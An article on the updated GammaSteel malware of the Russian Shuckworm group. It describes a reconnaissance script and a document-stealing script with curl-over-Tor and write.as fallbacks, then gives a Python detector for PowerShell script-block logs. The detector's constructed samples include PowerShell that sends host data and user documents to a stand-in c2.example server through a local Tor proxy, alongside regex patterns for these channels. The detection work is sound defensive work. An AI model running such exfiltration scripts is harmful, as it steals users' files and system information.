Russian Shuckworm APT is back with updated GammaSteel malware
One script served as a reconnaissance tool, collecting information about the compromised computer: system information, the names of any security software running, free space on each disk, the directory tree of the Desktop folder, and a list of all running processes. Everything it gathered was sent back to the C2 server.
New GammaSteel variant
The second script was a PowerShell version of GammaSteel that exfiltrated all files with certain extensions from specified directories such as Desktop, Downloads, and Documents. The targeted extensions were .doc, .docx, .xls, .xlsx, .ppt, .pptx, .vsd, .vsdx, .rtf, .odt, .txt and .pdf.
The new GammaSteel version uses PowerShell web requests to exfiltrate files and, if that fails, falls back to the cURL command-line tool routed through a Tor proxy to send the data out. Code in the sample also suggests the web service write.as was used as a further fallback exfiltration channel.
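The reconnaissance script and the GammaSteel exfiltration script described above give a detection engineer two behaviour clusters to look for in PowerShell script-block logging (Event ID 4104). The Python below is an added example, not Symantec's analysis code or the malware itself: it scores script-block text for the host-survey categories and the document-theft plus fallback-channel pattern the article describes, and runs over constructed log records. The cmdlet and WMI class names in the indicator sets are assumptions about how such scripts are commonly written, not strings taken from the real samples, and the sample script blocks are constructed for the example.

```python
import re

# Indicator groups for the reconnaissance script (assumed cmdlet/WMI names; the
# article names the categories, not the exact calls).
RECON_PATTERNS = {
    "system_info":       r"Get-ComputerInfo|systeminfo|Win32_OperatingSystem",
    "security_software": r"AntiVirusProduct|SecurityCenter2|Get-MpComputerStatus",
    "disk_space":        r"Win32_LogicalDisk|Get-PSDrive|FreeSpace",
    "desktop_tree":      r"Get-ChildItem[^\n]*Desktop[^\n]*-Recurse|tree\s+[^\n]*Desktop",
    "process_list":      r"Get-Process|tasklist|Win32_Process",
}
# Indicator groups for the GammaSteel document-theft script.
EXFIL_PATTERNS = {
    # the twelve document extensions the article lists
    "doc_extensions":    r"\.(docx?|xlsx?|pptx?|vsdx?|rtf|odt|txt|pdf)\b",
    "user_dirs":         r"\\(Desktop|Downloads?|Documents)\b",
    "ps_web_request":    r"Invoke-WebRequest|Invoke-RestMethod|Net\.WebClient|UploadFile|UploadData",
    # curl pointed at a local SOCKS proxy (Tor's default port is 9050) is the fallback channel
    "curl_tor_fallback": r"curl(\.exe)?[^\n]*(--proxy|-x)\s+\S*(socks[45]h?://|127\.0\.0\.1:9050|localhost:9050)",
    "write_as":          r"write\.as\b",
}
CHANNELS = {"ps_web_request", "curl_tor_fallback", "write_as"}


def match_indicators(script, patterns):
    """Return the names of every indicator group that fires on the script text."""
    return {name for name, pat in patterns.items() if re.search(pat, script, re.IGNORECASE)}


def classify_script_block(script):
    """Combine single indicators into verdicts that require more than one behaviour."""
    recon = match_indicators(script, RECON_PATTERNS)
    exfil = match_indicators(script, EXFIL_PATTERNS)
    channels = exfil & CHANNELS
    verdicts = []
    # several distinct host-survey categories plus an outbound channel in one block
    if len(recon) >= 3 and channels:
        verdicts.append("recon_collector")
    # targeted document types under user-profile folders plus an outbound channel
    if {"doc_extensions", "user_dirs"} <= exfil and channels:
        verdicts.append("document_exfil")
    # a primary PowerShell upload with a curl/Tor or write.as fallback beside it
    if "ps_web_request" in channels and len(channels) > 1:
        verdicts.append("layered_exfil_channels")
    return {"recon": sorted(recon), "exfil": sorted(exfil), "verdicts": verdicts}


def scan_events(events):
    """Map ScriptBlockId -> verdicts for every Event ID 4104 record that trips a rule."""
    hits = {}
    for ev in events:
        if ev.get("EventID") != 4104:   # only script-block logging carries the full text
            continue
        verdicts = classify_script_block(ev["ScriptBlockText"])["verdicts"]
        if verdicts:
            hits[ev["ScriptBlockId"]] = verdicts
    return hits


# Constructed script-block texts standing in for 4104 log content (not real samples).
RECON_SAMPLE = r"""$os = Get-WmiObject Win32_OperatingSystem
$av = Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct
$disk = Get-WmiObject Win32_LogicalDisk | Select DeviceID,FreeSpace
$tree = Get-ChildItem "$env:USERPROFILE\Desktop" -Recurse
$procs = Get-Process | Select Name,Id
Invoke-WebRequest -Uri http://c2.example/upload -Method POST -Body ($os,$av,$disk,$tree,$procs | Out-String)"""

EXFIL_SAMPLE = r"""$dirs = "$env:USERPROFILE\Desktop","$env:USERPROFILE\Downloads","$env:USERPROFILE\Documents"
$ext = "*.doc","*.docx","*.xls","*.xlsx","*.ppt","*.pptx","*.vsd","*.vsdx","*.rtf","*.odt","*.txt","*.pdf"
foreach ($f in Get-ChildItem $dirs -Include $ext -Recurse) {
  try { Invoke-WebRequest -Uri http://c2.example/u -Method POST -InFile $f.FullName }
  catch { curl.exe --proxy socks5h://127.0.0.1:9050 -F "file=@$($f.FullName)" http://c2.example/u }
}"""

# Admin one-liner: touches documents and a user folder but has no outbound channel.
BENIGN_SAMPLE = r"""Get-ChildItem C:\Users\alice\Documents -Filter *.docx | Measure-Object"""

SAMPLE_EVENTS = [
    {"EventID": 4104, "ScriptBlockId": "recon-1",  "ScriptBlockText": RECON_SAMPLE},
    {"EventID": 4104, "ScriptBlockId": "exfil-2",  "ScriptBlockText": EXFIL_SAMPLE},
    {"EventID": 4104, "ScriptBlockId": "admin-3",  "ScriptBlockText": BENIGN_SAMPLE},
    {"EventID": 4103, "ScriptBlockId": "pipe-4",   "ScriptBlockText": EXFIL_SAMPLE},  # wrong event type, ignored
]

if __name__ == "__main__":
    for block_id, verdicts in scan_events(SAMPLE_EVENTS).items():
        print(f"{block_id}: {', '.join(verdicts)}")
```

The point of requiring several categories per verdict is precision: a single `Get-Process` or a `Get-ChildItem` over Documents is routine, while five host-survey categories feeding one web request, or the twelve document extensions plus a curl call through a local SOCKS proxy, is not. The Tor fallback also gives a network-side check that does not depend on script logging at all: a workstation that suddenly has a local listener on 9050, or a curl.exe child of powershell.exe, is worth a look on its own.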